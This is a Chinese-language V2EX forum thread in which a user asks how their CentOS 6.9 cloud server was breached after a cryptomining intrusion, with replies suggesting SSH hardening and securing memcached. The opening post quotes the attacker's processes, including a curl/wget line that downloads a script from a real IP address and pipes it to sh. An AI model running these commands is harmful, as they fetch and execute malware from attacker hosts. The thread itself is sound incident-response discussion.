V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Recommended Services
Amazon Web Services
LeanCloud
New Relic
ClearDB
zzugyl
V2EX  ›  云计算

云主机被扫入侵,大家帮分析怎么解决?

  •  
  •   zzugyl · 2019-12-17 15:39:32 +08:00 · 4507 次点击
    这是一个创建于 1803 天前的主题,其中的信息可能已经有所发展或是发生改变。

    云主机被哪位大佬入侵了,清空了我的 crontab。并未破坏我的其他主要文件。 多了三个进程

    1  curl -s https://blockchain.info/balance?cors=true&active=
    2  /bin/sh -c (curl -s http://185.164.72.119/log_rotate.bin||wget -q -O- http://185.164.72.119/log_rotate.bin)|sh
    3  curl -o /tmp/keys http://178.32.46.58/keys
    

    执行的脚本如下: https://ideone.com/4OR7Xr

    我的主机系统版本:

    # lsb_release -a
    LSB Version:    unavailable
    Distributor ID: CentOS
    Description:    CentOS release 6.9 (Final)
    Release:        6.9
    Codename:       Final
    # uname -a
    Linux vt1 2.6.32-696.20.1.el6.x86_64 #1 SMP Fri Jan 26 17:51:45 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
    

    计算机密码随机大小写字母+数字+特殊符号。 V2 大佬们帮分析,是用了哪个漏洞入侵的?

    第 1 条附言  ·  2019-12-18 14:27:01 +08:00

    附上所有端口使用情况: https://ideone.com/jKCXUh

    我怀疑是openssh版本太低,系统默认的5.3p1

    # ssh -V
    OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013
    

    上午折腾升级到最新版本

    # ssh -V
    OpenSSH_8.1p1, OpenSSL 1.1.1d  10 Sep 2019
    
    13 条回复    2019-12-18 17:57:05 +08:00
    asd940808
        1
    asd940808  
       2019-12-17 16:08:31 +08:00   ❤️ 1
    改端口,禁 root 和密码登录。用密钥登录,应该就能避免绝大部分的入侵了吧?
    zzugyl
        2
    zzugyl  
    OP
       2019-12-17 16:18:11 +08:00
    @asd940808 #1 现在问题不严重。我想研究一下,他是怎么入侵的。感觉对方利用漏洞执行的。
    lovelynn
        3
    lovelynn  
       2019-12-17 19:25:49 +08:00   ❤️ 1
    你有没有开 redis 一般 crontab 修改的都是 redis 未授权访问
    zzugyl
        4
    zzugyl  
    OP
       2019-12-18 09:26:37 +08:00
    @lovelynn #3 没有跑 redis,有 memcached 和 nginx。
    lovelynn
        5
    lovelynn  
       2019-12-18 10:02:45 +08:00
    @zzugyl 我们微信沟通?
    akmonde
        6
    akmonde  
       2019-12-18 10:54:24 +08:00   ❤️ 1
    这就是挖矿的脚本,memcached 看看是不是空口令弱口令~杀掉进程,删除 blockchain 下载的挖矿脚本,改下密码就行~
    nicevar
        7
    nicevar  
       2019-12-18 11:59:09 +08:00   ❤️ 1
    一般就那几点时,ssh 默认 22 端口还允许 root 登陆、redis/MySQL 之类暴露公网了、站点有漏洞让拿到 webshell
    nicevar
        8
    nicevar  
       2019-12-18 12:02:30 +08:00
    另外这可能都不是人为直接操作入侵的,大佬没必要盯着一台小服务器浪费时间,估计就是自动入侵程序随机扫描搞定了
    tomychen
        9
    tomychen  
       2019-12-18 14:06:47 +08:00   ❤️ 1
    先说说开了哪些服务,这是其一
    其二是很多小的 vps 提供商可能被默认值入或者被 hacking 值入模版...
    zzugyl
        10
    zzugyl  
    OP
       2019-12-18 14:28:42 +08:00
    @nicevar #7 正好开放了 22 端口,在内网情况下。root 登录开放了。
    tomychen
        11
    tomychen  
       2019-12-18 14:34:29 +08:00
    @zzugyl 我指的是 web redis 等等这种 bind 0.0.0.0 暴露的,或者通过接口能够访问到的
    因为直写 crontab 说明已经 root 了
    smallgoogle
        12
    smallgoogle  
       2019-12-18 17:23:55 +08:00   ❤️ 1
    你可能是 web 漏洞 然后被提权了而已。
    zzugyl
        13
    zzugyl  
    OP
       2019-12-18 17:57:05 +08:00
    我把 openssh 升级到最新版。把 memcached 指定到 127.0.0.1。顺便更新了一下系统。看看明天还会不会被入侵。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2250 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 31ms · UTC 01:40 · PVG 09:40 · LAX 17:40 · JFK 20:40
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.